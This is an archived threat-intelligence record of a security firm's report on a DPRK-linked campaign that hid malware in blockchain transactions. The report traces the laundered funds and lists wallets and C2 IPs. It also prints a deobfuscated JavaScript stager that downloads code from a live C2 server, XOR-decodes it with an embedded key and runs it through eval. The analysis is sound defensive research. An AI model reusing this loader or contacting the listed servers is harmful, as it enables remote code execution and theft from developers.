{
	"id": "647480f0-ef77-4935-90b8-82b06b685882",
	"created_at": "2026-04-06T00:12:44.534205Z",
	"updated_at": "2026-04-10T03:28:28.705932Z",
	"deleted_at": null,
	"sha1_hash": "4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2",
	"title": "Cross-Chain TxDataHiding Crypto Heist: A Very (Very) Chainful Process (Part 4)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2391248,
	"plain_text": "Cross-Chain TxDataHiding Crypto Heist: A Very (Very) Chainful\r\nProcess (Part 4)\r\nBy Ransom-ISAC\r\nPublished: 2025-12-08 · Archived: 2026-04-02 12:47:41 UTC\r\nExecutive Summary\r\nIn September 2025, Ransom-ISAC was brought in by Crystal Intelligence to investigate a cryptocurrency and data theft\r\nattempt via a private weaponised GitHub repository. What initially appeared to be a standard phishing campaign, quickly\r\nevolved into something far more sophisticated—a multi-layered attack leveraging novel blockchain-based command-and-control infrastructure and cross-platform malware designed to compromise development environments at scale.\r\nPart 1 of this series delves into the sophisticated nature of a potentially attributed DPRK campaign where novel tradecraft\r\nsuch as Cross-Chain TxDataHiding techniques combined with the subsequent creation of a takedown-proof Command and\r\ncontrol (C2) infrastructure. Part 2 continues with a holistic analysis of the core malicious payloads with a complete view into\r\nthe entire kill chain.\r\nPart 3 focuses on analysing the threat actor's operational infrastructure to support attribution efforts. Through collaboration\r\nwith Bridewell, the research uses infrastructure fingerprinting and open-source intelligence to identify related threat clusters\r\nand potentially connected campaigns.\r\nPart 4 follows the money through on-chain analysis, tracing stolen funds across BSC and TRON blockchains and connecting\r\nwallet addresses directly to other DPRK exchange thefts. Produced in collaboration with Crystal Intelligence, this piece\r\nreveals centralised exchange interactions, swap transactions linked to Russian IP addresses, and the multi-chain laundering\r\ntechniques used to move funds—providing blockchain forensic evidence that ties this campaign to a broader pattern of\r\nNorth Korean cryptocurrency operations.\r\nShould you have any information that can potentially support or refute our analysis, please feel free to reach out to us at\r\nRansom-ISAC. As and where assumptions or estimates are made to fill the gaps in our analysis, they have been stated\r\nclearly so that the reader is aware.\r\nInfrastructure Analysis\r\nFollowing the analysis and discovery of blockchain activity, and using the addresses as on-chain start points, we decided to\r\nexamine the transaction relationships.\r\nCrystal Expert Users can view the graphs associated with this case here\r\nFrom the previous investigation, we began with the following TRON network start points,\r\nTMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP and TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG .\r\nBoth addresses were funded by a common source for fees, TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy . Examination of this fee\r\npaying address identified a third address, TLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe that also contained a significant number\r\nof pointers to transactions on BSC. A review of all these transactions identified 52 pointers on other chains (See IoCs)\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 1 of 15\n\nCrystal Intelligence Platform - Tracking TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy\r\nCrystal Intelligence Platform\r\nOf these, all related to a single address, 0x9bc1355344b54dedf3e44296916ed15653844509 . This address also deployed a\r\ntoken contract, BOT250205 at 0x8eac3198dd72f3e07108c4c7cff43108ad48a71c .\r\nBOT250205\r\nA perculiar token, there are only four holders including the 0x9bc1355344b54dedf3e44296916ed15653844509 address, the\r\nother three:\r\n0x2CEe09458B7Ed8F2ED54502DbEd908E83cA78A77\r\n0x3aCa68A063f9ab2CFcc9732554190199F9b09f7B\r\n0x0003D4eD8e99F2517Eb4Cb14CFbbc115cFc0208b\r\nExamination of the transactions by these addresses revealed additional message encoded on-chain. These were not able to be\r\nde-obfuscated successfully at time of writing.\r\nThe contract itself does not appear to be much other than an additional input field, 'transaction text'. There have only been 23\r\ntransactions involving the contract since its deployment in early 2025.\r\nThe of note, the 0x9 address was funded by 0xb351954037bd1c38d7677db7fe429706c7b016da ; this same address bridged\r\nfunds using Allbridge to TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy, which served as source of fees for the intial pointer\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 2 of 15\n\naddresses.\r\nA Cold Case?\r\nInvestigating the source of funds for 0xC613B8f9824E6Dc7520F5f1027f4818FC64D8490 , which itself acted as the source of\r\nfunds for the entire project revealed even more complexity; funds at this address were raised on the Aurora chain through\r\nseveral bridges between Aurora, Ethereum and then BSC. Ultimately these funds were traced to a centralised exchange,\r\nthough notably the transaction was from as far back as 2021.\r\nThis pattern was common in many of the infrastructure transfers; addresses lay dormant for long periods, which were later\r\noperationalised for infrastructure use. In most cases they received funds from centralised exchange sources.\r\nCrystal Intelligence Platform - 0xC613B8f9824E6Dc7520F5f1027f4818FC64D8490\r\nShow Me The Money\r\nTypically in blockchain investigations, cases involve trying to identify payment relationships between addresses. This may\r\nbe useful for attribution of a threat actor, as well as identification of common source and destination services.\r\nIn this case, our first step was to consider the TRX, the native token of the TRON network, used to pay transaction fees,\r\nobtained by TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy which in turn funded the TRX malware pointer addresses. TRX was\r\nsourced from two locations; a popular instant swap service and a cross chain bridge.\r\nTemporal analysis of these pointer address transaction showed that the majority of this activity began in early June 2025\r\nduring weekdays suggesting operations during a standard working week.\r\nTemporal Analysis of payment addresses\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 3 of 15\n\nIt was also noticeable that the TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy address also received 1,012 USDT from an instant\r\nswap service. This may have been intended as pre-staged funds to allow it to be self sustaining and purchase TRX for\r\ntransaction activity, however the funds moved almost immediately to BSC using the cross chain bridging service Allbridge\r\nat 0xab57bf80d77bf250331f9e1a523b2c11485a1a64 on BSC.\r\nInterestingly, the original TRX transaction by TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP\r\n( 3fa56cbb32712d3a0aff2daf79737616832b860b18b77755755ad79b35e94436 ) with the message 'Mxy Custom Memo Text'\r\npoints to a likely self custodial address, THK2LfzQ7FFgheR33fQcmBnPVnGKQNuetU . The counterparties of this address include\r\nknown hubs for DPRK related funds, including Huione, Xinbi Guarantee and BlackU.\r\nMultiple chains and bridges were used by this group, including Aptos, Allbridge, Stargate, Bridgers to name but a few.\r\nNotably absent was the use of mixing or other purpose built obfuscation services\r\nThe 0xab57bf80d77bf250331f9e1a523b2c11485a1a64 wallet had significant activity, receiving over 25 000 USDT between\r\nOct 2024 and Apr 2025. Tracing forwards from this address showed similar bridging activity, eventually with exposure to\r\nseveral addresses identified in connection with North Korean thefts.\r\nRussian IP Overlap\r\nAccording to collateral sources, one of the wallets was accessed via IP address 188.43.33[.]249\r\nWhilst TrendMicro reported on this in April 2025 of possible shared overlap, there have been very few other public reports\r\nof such useage.\r\nPerforming a lookup of the IP address in question indicates the owner as TRANSTELECOM, or TTK, based in Russia:\r\nThe presence of a DPRK-linked IP address geolocating to Vladivostok is consistent with North Korea's known internet\r\ninfrastructure arrangements with Russia. According to a 2019 NATO CCDCOE paper on North Korean cyber operations,\r\nTransTeleCom (TTK), one of Russia's largest telecommunications companies, began providing internet service to North\r\nKorea in October 2017 via a fiber-optic cable linking Vladivostok to the North Korean border.\r\nThis connection was established after North Korea's network experienced disruptions, including a nine-hour outage\r\nfollowing an ICBM launch in July 2017, prompting Pyongyang to diversify its internet access beyond its existing China\r\nUnicom link. Given this infrastructure runs through Vladivostok, DPRK-associated traffic routing through or appearing to\r\noriginate from that location is expected. Note the proximity in the below image of Vladivostok to Pyongyang:\r\nSource: TTK website\r\nThe paper also highlights that North Korea deliberately conducts cyber operations from third-party countries to obscure\r\nattribution and complicate any response. North Korean cyber units, particularly Unit 180 which specializes in financial\r\noperations, typically operate overseas to mask the link between their activities and Pyongyang.\r\nResearchers at Recorded Future identified North Korean cyber operatives maintaining a physical presence across multiple\r\ncountries including China, India, Malaysia, and others. Given the TTK infrastructure passes through Russian territory and\r\nthe close diplomatic and economic ties between the DPRK and Russia—including arrangements that facilitate North Korean\r\nworkers and personnel in Russian border regions—observing DPRK-associated network activity in Vladivostok would not\r\nbe unusual.\r\nThe geolocation of the 33.249 IP address is also very interesting, resolving to Vladivostok, Primorye, RU (43.1153° N,\r\n131.9090° E).\r\nThis leads to a building conveniently adjacent to the former Consulate General of the United States on Google Maps.\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 4 of 15\n\nSource: Google Maps\r\nNote: this was formally the US Consulate based in Vladivostok although closed down and was turned into the Uzbekistan\r\nConsulate you can find more information here: https://embassies.info/ConsulateofUzbekistaninVladivostokRussia.\r\nLocation of IP address, Present Uzbek Embassy Building (Source: Yandex Maps)\r\nA New Numbers Station? Strange TxDataHiding\r\nDuring the review of transaction messages, several unusual artefacts emerged that had been embedded on chain. The\r\npurpose of these artefacts is not known, however it may have been used for testing purposes. It may also be a primitive form\r\nof misdirection, or even an unknown Capture the Flag (CTF) using the same infrastructure as the threat actor.\r\nThis was related to 0x6bEf55A0BB4bFF96f947eb1f87E9a59031BB1686 which was connected to our original\r\n0x000000000000000000000000000000000000dEaD addresses.\r\nSimilar transactions were also observed on Polygon in more recent days, which may be indicative of testing alternative\r\nmethods for delivery\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 5 of 15\n\nCrystal Intelligence Platform\r\nUnusual Strings\r\nStrange string:\r\n\"Hello my name is Charlie\"\r\nhttps://bscscan.com/tx/0x41e594f1605522af0b91b7047255685c81c1f2fa785c3d59f76220205e2b1c59\r\nThe destination wallet which appears to be one for this campaign had a JPEG of a chest X Ray embedded in it:\r\nhttps://bscscan.com/tx/0x35abd696c971db5baa4db138fbd091b56a9837edf21ec5d9db9f60a21688f622\r\nA sample medical report (pdf) with synthetic data:\r\nhttps://bscscan.com/tx/0x31f7276a8b474891f0b072aba96ec456ed05e8d14d9fba6943fa532fbe4bfebf\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 6 of 15\n\nFake legal document:\r\nOther PDFs included what looks like some garbage data for a fake contract:\r\nhttps://bscscan.com/tx/0x23dcad0d020465454c91ffbdef03622411514661b89791b097f49e2363d88ada\r\nAn audio file was also found, reporting 'Stratus File Test':\r\nhttps://bscscan.com/tx/0xe2ce2c1a48f253df8605412ddc45a425d63a6d0eaa4d7f97801a08f8a58af75c\r\nA 'test gif':\r\nhttps://bscscan.com/tx/0x4d81bab4dc927a4e7ca1a576ed9f697f9d0bed9f410935189a7a8b8f6ccadf10\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 7 of 15\n\nCryptographic Keys\r\nNumerous AES GCM algorithms:\r\nAES-GCM IP cores implement the Advanced Encryption Standard (AES) in Galois Counter Mode (GCM). AES-GCM is a\r\nwidely used cryptographic algorithm for Authenticated Encryption with Associated Data (AEAD) purposes, providing both\r\ndata confidentiality and authenticity.\r\nIts very likely that the threat actor is utilising this to further complicate their obfuscation techniques. Without the key and\r\nnonce it is near impossible to deobfuscate contents that are encrypted.\r\nhttps://bscscan.com/tx/0x0f8211634dfd292dc5a27e3e18258c830b7eae1a12db20a172e409c2750905d7\r\nhttps://bscscan.com/tx/0xd5a9027b4878bfe0683c1232aa68931b0da1a942cfff9af282d46648fa84f1e3\r\nhttps://bscscan.com/tx/0xa5ff50df963bba22349c9bfb2d3e1165833a1c955581213c1c3942a40fb559fc\r\nhttps://bscscan.com/tx/0x8d011dbc99962ee919279702d0eab286ed08787341fcdc5342e41d3453ed0108\r\nToken Contract\r\nThe following is a sample GCM:\r\nhttps://bscscan.com/tx/0x90aa1383cb1717aaf9f3b77451b09acb017f14490a778e4d33cb0bb70a0e7df2\r\nThis is a Stratus (STRAT) ERC-20 token contract - essentially digital money on the Ethereum blockchain. When deployed,\r\nit creates a fixed supply of 100 million STRAT tokens (with 18 decimal places) and sends them all to a single wallet address.\r\nFrom there, people can transfer tokens to each other, check their balances, and approve other addresses (like decentralized\r\nexchanges) to spend tokens on their behalf. It also includes a \"permit\" feature that lets users approve spending via a\r\ncryptographic signature instead of an on-chain transaction, which saves gas fees. It's a standard, minimal token contract with\r\nno special mechanics like taxes, minting, burning, or admin controls - just basic fungible token functionality.\r\nXCTDH History\r\nBased on the BSC wallet we followed in Parts 1-3, 0x9BC1355344B54DEDf3E44296916eD15653844509 , we can also perform\r\nsome timeline analysis to assess that at the very least BSC-based Transaction Data Hiding (TxData Hiding) has existed as\r\nearly as February 7 2025; as this is the first occurrence of a transaction containing a malicious obfuscated payload:\r\n0x00296c01c443aee6712330a97e851c4a100c9764bd56426f432c2c802c7005fd\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 8 of 15\n\nInterestingly there were also multiple transactions not only deliberately made to dead wallets\r\n0x000000000000000000000000000000000000dEaD but also to other wallets likely for testing:\r\nCrystal Intelligence Platform\r\n0x8EaC3198dD72f3e07108c4C7CFf43108AD48A71c - This address is the BOT 2025 Deployer\r\n0xF55657e8ADefaE0578D771ddb942d22A70328478 - this address, similar to others, used a number of cross-chain bridges.\r\nThough tracing on chain there were no suspicious connections, deposits from this address were made to Republic of Korea\r\nbased Centralised Cryptocurrency Exchange services, as well as other large international services.\r\nCrystal Intelligence Platform\r\n0x37648d37BbB103e0cFD1cBe399B3f46b3E6b3a0f - sent funds to malware transaction address; active on multiple chains.\r\nExposure to centralised exchanges and many DeFi services.\r\nCrystal Intelligence Platform\r\n0xB351954037Bd1c38d7677DB7FE429706c7b016dA - sent funds to TQdwohPCWqqfCUaCispyV1NaUZ1HgiJPUy , the gas funding\r\naddress for the initial pointer addresses via bridges.\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 9 of 15\n\nCrystal Intelligence Platform\r\n0x3aCa68A063f9ab2CFcc9732554190199F9b09f7B sent funds to BSC malware transaction address, recieved from\r\n0xb351954037bd1c38d7677db7fe429706c7b016da .\r\nRAT Timeline\r\nUsing the same deobfuscation techniques outlined in Parts 1 and 2, timeline analysis was also performed on all transactions\r\ncontaining more than 10,000 characters associated with wallet 0x9BC1355344B54DEDf3E44296916eD15653844509 . These were\r\nall the Remote Access Trojan (RAT) DEV#POPPER.JS variants which we found in our prior investigation. The full list of\r\ndeobfuscated RAT scripts can be found in the GitHub repository for Part 4.\r\nThe cluster list:\r\nIP Address First Seen\r\n136.0.9.8 12/06/2025\r\n166.88.4.2 12/06/2025\r\n23.27.202.27 20/06/2025\r\n23.27.120.142 08/10/2025\r\n202.155.8.173 30/10/2025\r\n198.105.127.210 14/11/2025\r\n166.88.134.82 21/11/2025\r\nThe following is the timeline of occurances from the transactions found:\r\nTemporal Analysis of DEV#POPPER.JS C2 Activity\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 10 of 15\n\nNote that the occurances of the bottom three IP addresses 23.27.202[.]27 , 166.88.4[.]2 , and 136.0.9[.]8 were\r\nreduced in frequency post the XCTDH publications of Parts 1 \u0026 2.\r\nInitial Stager\r\nFurthermore, we noted that the second contract initiated,\r\n0x07a02d3bda74523a8571482380f2c8a24cfe24db03c96714abfebad44a60c404 , occuring on Feb-07-2025 04:47:45 AM UTC\r\nwas actually the first Python Downloader (Payload1_2 (HTTP Payload Stager)) which ultimately leads to downloading\r\nthe OmniStealer malware as discussed in Part 2: The difference being that the IP address is slightly different and an\r\ninteresting string is left behind, BEP-20: BOT250205 (BOT):\r\nC2 Stager in XCTDH Case\r\nField Value\r\nC2 IP 154.91.0[.]103\r\nC2 Port 27017 (0x6989)\r\nFull C2 URL http://154.91.0[.]103:27017/$/boot\r\nXOR Key ThZG+0jfXE6VAGOJ\r\nUser-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML; like Gecko)\r\nChrome/131.0.0.0 Safari/537.36\r\nContract\r\nName\r\nBEP-20: BOT250205 (BOT)\r\nInterestingly the full contract stems back to the mint method of contract initiation; this is used to create the BOT250205\r\ntoken, which was allocated to several of the BSC addresses used by the malware deployer.\r\nThe obfuscation used here is much simpler and seems like a prototype from the more sophisticated techniques we saw in the\r\nearlier parts of this series:\r\nglobal._H = \"http://154.91.0.103:27017\";\r\n(async () =\u003e {\r\n await eval(\r\n (function (a) {\r\n const b = \"ThZG+0jfXE6VAGOJ\";\r\n const d = b.length;\r\n let e = \"\";\r\n for (let f = 0; f \u003c a.length; f++) {\r\n const g = a.charCodeAt(f);\r\n const h = b.charCodeAt(f % d);\r\n e += String.fromCharCode(g ^ h);\r\n }\r\n return e;\r\n })(\r\n await (async function () {\r\n return new Promise((c, d) =\u003e {\r\n const e = new URL(global._H + \"/$/boot\");\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 11 of 15\n\nconst f = {\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML; like Gecko) Chrome/131.0.0.0 Safari/53\r\n };\r\n const g = {\r\n method: \"GET\",\r\n hostname: e.hostname,\r\n port: e.port,\r\n path: e.pathname,\r\n headers: f,\r\n };\r\n const i = require(\"http\").request(g, (j) =\u003e {\r\n let k = \"\";\r\n j.on(\"data\", (l) =\u003e {\r\n k += l;\r\n });\r\n j.on(\"end\", () =\u003e {\r\n c(k);\r\n });\r\n });\r\n i.on(\"error\", (j) =\u003e {\r\n d(j);\r\n });\r\n i.end();\r\n });\r\n })()\r\n )\r\n );\r\n})();\r\nConclusion\r\nThis case highlights the extreme complexity of modern on-chain investigations; multiple blockchains, tokens, decentralised\r\nexchanges and cross chain bridges taxed every analyst; coupled with this, the embedded data on chain required additional\r\nskills not common in many investigations to decode.\r\nThese techniques may slow an investigator, but ultimately can be unwound. The lack of specific obfuscaton services -\r\nmixing services, and privacy coins, also is significant and demonstrates a high level of confidence in cross chain as an\r\neffective evasion method for deniable onchain activity.\r\nOur interpretation of the unusual transaction payloads - images, pdf files, audio - is that that they may be indicative of a test\r\nrange; references to Stratus may be to Datadog's Red-Team application (https://github.com/DataDog/stratus-red-team),\r\nthough is a low confidence assessment. In many areas, this case raises more questions than answers, the more we dig.\r\nDespite these gaps in knowledge, it can be stated conclusively is that this attack chain shows a high level of mastery and\r\nresources for public blockchains by DPRK related entities. And whilst this threat uses several chains for the malicious\r\npayload, concievably it can be on almost any blockchain.\r\nRansom-ISAC's View\r\nCrypto, aged like fine wine\r\nIt was noteworthy that the infrastructure - the tokens used to fund the various transactions - had laid dormant in many cases\r\nfor years. This aging process may be indicative of attempts to conceal the true nature of the address holder.\r\nFrom Russia with Malware\r\nThe identification of a Russian IP address in Vladivostok is highly significant; with warming ties between DPRK and the\r\nRussian Government resulting from military cooperating in the latter's illegal occupation of Ukraine, it is possible DPRK\r\naffiliated groups may have been conducting their operations from Russia - or at least, Russian IP addresses.\r\nOverlapping payment infrastructure\r\nAnother unexpected turn in this project was the overlapping payments with known DPRK theft addresses. Typically, APT\r\nteams are understood to work in discrete groups that are disconnected from the payment infrastructure. In this case however,\r\nfunds bridged between blockchains eventually interacted with addresses related to other DPRK thefts. Whilst this may be\r\nconstrued as poor operational security, it may also represent a nonchalance towards any law enforcement consequences\r\ntowards their activities.\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 12 of 15\n\nFollow the Code\r\nAs a community, we need to move beyond \"follow the money\" when investigating cryptocrime. The emergence of\r\nEtherhiding, TxDataHiding, and Cross-Chain TxDataHiding—deployed alongside campaigns like Contagious Interview—\r\ndemonstrates that we're still in the early stages of understanding how sophisticated these techniques will become. From here\r\non out, \"follow the code\" is far more fitting.\r\nAcknowledgments\r\nWe extend our gratitude to all collaborators who contributed their expertise to this investigation: François-Julien Alcaraz,\r\nNick Smart, Andrii Sovershennyi, Yashraj Solanki, Joshua Penny, Tammy Harper and Ellis Stannard. Special thanks\r\nto the Ransom-ISAC members whose collective intelligence and collaborative approach made this analysis possible.\r\nIndicators of Compromise (IOCs)\r\nFilename Filename SHA256\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n011025_0x09e61c8f00b01eaa28b3ffaafdeb5f0d402357b87573400ebad1e25f3d9c8693_FINAL.txt 07f24071e2914c0be1270\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n011025_0x1a4272be3c516faea9093f5c2fadadb620cfe8bfbd50e22008847e6056fd91b9_FINAL.txt 6ca251da28246371936cb\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n011025_0x3b77783f8952ae8235a873a2ac6757f8ae563de56d0006d3f92fd8d73b45ac58_FINAL.txt b9264734cdc4bdc0cf093\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n011025_0xc3d4740f747e2f0adf622d2ac48ef6bda4b18e3d152028f0f8027216199c4fee_FINAL.txt 27dd9a146de5f8e7978a0\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n011025_0xf9fca982ce5a8ae9463f7b469496a2554d0f09c8ca67ca5034de621963673a5e_FINAL.txt 4038400fbf249d9b61038\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n011225_0x4ff108d057d6e62ec110a5c8a85b1b404aa0bf6299d63ee9a7679d858c981f0f_FINAL.txt e37ef036d36de9697c551\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n020725_0xc8090a40230cfacb82ead30d8d290a22f8e5f508800d725f8ae2dd1d35e03427_FINAL.txt e18ddf47412ad4b1ed92d\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n071025_0x6c777ac28d0dba345eeda8b65625ef1aec69ecb5a489f25f2a2545cf3b3bb344_FINAL.txt eed4768a1127c2e15fc3f9\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n071025_0xf0adf6867fa5e1f7f9323e992dcad37eda3ca9bff82f49729ff1b85ab84a10d9_FINAL.txt 913081a0cfad76e49c6c7\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n081025_0x5fa89795ed04f9aa6f1969db1e5ce1767450da04cb86dd1ce582f25891dfd976_FINAL.txt 89eb1359cb19f926caf29\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n091025_0x828f00daa9fa68b36d2f2380f3fdc27265c53417ef01660b5421ea1125fad2de_FINAL.txt 1c5a64ccbe846c159ac05\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n091025_0xa1f957a901cdfeb603641b8cd8de22d6ef765bc102e1ce50c7494fb19ea1835d_FINAL.txt 383a8da67be2067b37969\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n120625_0x95cac861a838481cbef0557e60098703038acfc920abfdcf272714cfbc7c12e9_FINAL.txt 7af08b2fa4b31e38f5a43b\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 13 of 15\n\nFilename Filename SHA256\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n130625_0x1cfb0f48dbed9db15451b06328619e3cc33f22616611411afc5be3005e768b59_FINAL.txt 612cd30ca0f3dba0145bd\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n130625_0x377ee776fc12e468813a1cb1f36b71b973f40f78baf053f6ef77bf35968d706e_FINAL.txt e6581a900989e859c7cb3\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n130625_0x37a83b05ab074c13bacd2493b97b876f97bc310726c9f8191982e4df180fc851_FINAL.txt 5171c3af3f5d10194345b\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n130625_0x3925fbf4a2e49966bc2d84cb4c134a28059e8483f7f8e2750c5aae737bfebe1d_FINAL.txt 0ff16be0423bc8cba51cb\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n130625_0xf7e6cbd4551c45cfeb3f57574f7685dde8ca6be7a6ce5f99cf5ff237a6e51cde_FINAL.txt d373bad3feea05081330e\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n141125_0x4e0c8d86a755bc1a658619c9f399c3e108150539809bd049d9d8e7e3160bd388_FINAL.txt dd0aa0d09d093781febc7\r\nDEV#POPPER.JS\r\nRAT\r\nVARIATIONS\r\n170625_0x03decfa85c107de640312424534ae89a8457ede2f7582c4b84d20f158c9f3e36_FINAL.txt e2fdf1a6b938bfed8c81af\r\nNote: Due to the extensive nature of the malware IOCs (70+ entries), the complete list is available in the GitHub repository\r\nfor Part 4.\r\nType Indicator\r\nFirst Seen\r\n(DD/MM/YYYY)\r\nNotes\r\nIP login to access cryptocurrency\r\nwallet\r\n188.43.33[.]249 N/A\r\nVladivostok-related address to\r\nTKK\r\nInitial IP from Python Downloader\r\n(Payload1_2 HTTP Payload Stager)\r\n154.91.0[.]103 07/02/2025\r\nAttributed to backdoor reported\r\nby MalwareHunterTeam\r\nDEV#POPPER.JS RAT IP 136.0.9.8 12/06/2025 Timeline analysis above\r\nDEV#POPPER.JS RAT IP 166.88.4.2 12/06/2025 Timeline analysis above\r\nDEV#POPPER.JS RAT IP 23.27.202.27 20/06/2025 Timeline analysis above\r\nDEV#POPPER.JS RAT IP 23.27.120.142 08/10/2025 Timeline analysis above\r\nDEV#POPPER.JS RAT IP 202.155.8.173 30/10/2025 Timeline analysis above\r\nDEV#POPPER.JS RAT IP 198.105.127.210 14/11/2025 Timeline analysis above\r\nDEV#POPPER.JS RAT IP 166.88.134.82 21/11/2025 Timeline analysis above\r\nCrypto / Blockchain IOCs\r\nKey blockchain addresses and transaction hashes identified during the investigation:\r\nType Indicator Notes/Message\r\nBlockchain 0x6bEf55A0BB4bFF96f947eb1f87E9a59031BB1686 DPRK-Linked Potential Communications Channel\r\nCross-Chain\r\nPointer\r\nTMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP 0xb980676a283234de8abb91a9ecfd1ca5055ab1119492f08bc31711d8ef48cb2\r\nBlockchain TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP Mxy custom memo text\r\nCross-ChainTXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG 0xd33f78662df123adf2a178628980b605a0026c0d8c4f4e87e43e724cda258fef\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 14 of 15\n\nType Indicator Notes/Message\r\nPointer\r\nCross-Chain\r\nPointer\r\nTLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe 0x197b587bc976641277791f951518667f12c93d1ace916b3fe79f84759a62f504\r\nCross-Chain\r\nPointer\r\nTLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe 0xda655e6b69e98cbdda93e31804827b49410880bbb3c17b908a71efe85e284dfa\r\nCross-Chain\r\nPointer\r\nTLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe 0x6c777ac28d0dba345eeda8b65625ef1aec69ecb5a489f25f2a2545cf3b3bb344\r\nCross-Chain\r\nPointer\r\nTLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe 0xf0adf6867fa5e1f7f9323e992dcad37eda3ca9bff82f49729ff1b85ab84a10d9\r\nCross-Chain\r\nPointer\r\nTLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe 0xc3d4740f747e2f0adf622d2ac48ef6bda4b18e3d152028f0f8027216199c4fee\r\nCross-Chain\r\nPointer\r\nTLmj13VL4p6NQ7jpxz8d9uYY6FUKCYatSe 0x1a4272be3c516faea9093f5c2fadadb620cfe8bfbd50e22008847e6056fd91b9\r\nNote: The complete list of 52+ cross-chain pointers and blockchain IOCs is available in the GitHub repository for Part 4.\r\nSource: https://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nhttps://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist-part-4/"
	],
	"report_names": [
		"cross-chain-txdatahiding-crypto-heist-part-4"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434364,
	"ts_updated_at": 1775791708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2.pdf",
		"text": "https://archive.orkl.eu/4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2.txt",
		"img": "https://archive.orkl.eu/4f2c964fbf2a5f804e62160d1c3d587d4aab7ad2.jpg"
	}
}